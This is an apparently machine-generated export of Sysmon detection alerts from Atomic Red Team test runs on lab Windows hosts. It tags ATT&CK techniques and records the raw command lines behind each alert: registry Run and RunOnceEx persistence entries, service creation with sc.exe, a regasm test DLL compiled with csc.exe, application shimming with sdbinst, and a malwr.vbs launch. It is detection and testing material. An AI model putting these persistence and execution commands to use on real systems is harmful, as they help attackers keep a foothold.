",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "del T1121.dll" ),1,"
1
5
4
1
0
0x8000000000000000
3615
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:56.002
747F3D96-D7A4-5D31-0000-0010C9C22900
6804
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "del T1121.dll"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" ),1,"
1
5
4
1
0
0x8000000000000000
3613
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:55.672
747F3D96-D7A3-5D31-0000-001081B22900
5800
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966429
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:52:25.853
365ABB72-5689-5C91-0000-0010543F0800
3896
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"
1
5
4
1
0
0x8000000000000000
3611
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:55.057
747F3D96-D7A3-5D31-0000-0010F2A42900
4784
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
4.7.3190.0 built by: NET472REL1LAST_C
Visual C# Command Line Compiler
Microsoft® .NET Framework
Microsoft Corporation
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D
747F3D96-D7A3-5D31-0000-0010A0A22900
6748
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ) contain suspicious command ( \csc.exe),1,"
1
5
4
1
0
0x8000000000000000
3610
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:55.023
747F3D96-D7A3-5D31-0000-0010A0A22900
6748
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ),1,"
1
5
4
1
0
0x8000000000000000
3610
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:55.023
747F3D96-D7A3-5D31-0000-0010A0A22900
6748
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966423
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:49:45.052
365ABB72-55E9-5C91-0000-00102EEB0700
2104
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3606
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:06.251
747F3D96-D772-5D31-0000-00107CF02800
324
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" ),1,"
1
5
4
1
0
0x8000000000000000
3603
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:06.180
747F3D96-D772-5D31-0000-001031EB2800
6472
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll ),1,"
1
5
4
1
0
0x8000000000000000
3600
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:06.056
747F3D96-D772-5D31-0000-0010BEE52800
3216
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3599
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:53.388
747F3D96-D765-5D31-0000-001024C32800
4264
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" ),1,"
1
5
4
1
0
0x8000000000000000
3596
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:53.314
747F3D96-D765-5D31-0000-0010D7BD2800
5824
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
1966634
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 23:13:38.586
365ABB72-77A2-5C91-0000-00100A570100
1636
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-777F-5C91-0000-0020E7030000
0x3e7
0
System
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-777F-5C91-0000-00100B590000
516
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
1966633
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 23:13:38.576
365ABB72-77A2-5C91-0000-00106D560100
1628
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-777F-5C91-0000-0020E7030000
0x3e7
0
System
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-777F-5C91-0000-00100B590000
516
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" ),1,"
1
5
4
1
0
0x8000000000000000
3593
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:53.201
747F3D96-D765-5D31-0000-001027B72800
6584
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3588
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:09.337
747F3D96-D739-5D31-0000-0010B2C22600
6896
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" ),1,"
1
5
4
1
0
0x8000000000000000
3585
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:09.225
747F3D96-D739-5D31-0000-0010E4BB2600
4744
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" ),1,"
1
5
4
1
0
0x8000000000000000
3583
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:09.142
747F3D96-D739-5D31-0000-00104CB72600
5000
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services using Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService") in directory : ( C:\AtomicRedTeam\ )",1,"
1
5
4
1
0
0x8000000000000000
3581
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Persistence or Exec - Services Management
2019-07-19 14:44:08.269
747F3D96-D738-5D31-0000-0010D8AA2600
4260
C:\Windows\System32\sc.exe
10.0.17763.1 (WinBuild.160101.0800)
Service Control Manager Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
sc.exe start AtomicTestService
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
747F3D96-D738-5D31-0000-001056A62600
2556
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ),1,"
1
5
4
1
0
0x8000000000000000
3580
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:08.227
747F3D96-D738-5D31-0000-001056A62600
2556
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services using Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe") in directory : ( C:\AtomicRedTeam\ )",1,"
1
5
4
1
0
0x8000000000000000
3577
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Persistence or Exec - Services Management
2019-07-19 14:44:08.181
747F3D96-D738-5D31-0000-001098A22600
1700
C:\Windows\System32\sc.exe
10.0.17763.1 (WinBuild.160101.0800)
Service Control Manager Configuration Tool
Microsoft® Windows® Operating System
Microsoft Corporation
sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
747F3D96-D738-5D31-0000-001046A02600
4216
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ),1,"
1
5
4
1
0
0x8000000000000000
3576
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:44:08.146
747F3D96-D738-5D31-0000-001046A02600
4216
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"
1
5
4
1
0
0x8000000000000000
1966563
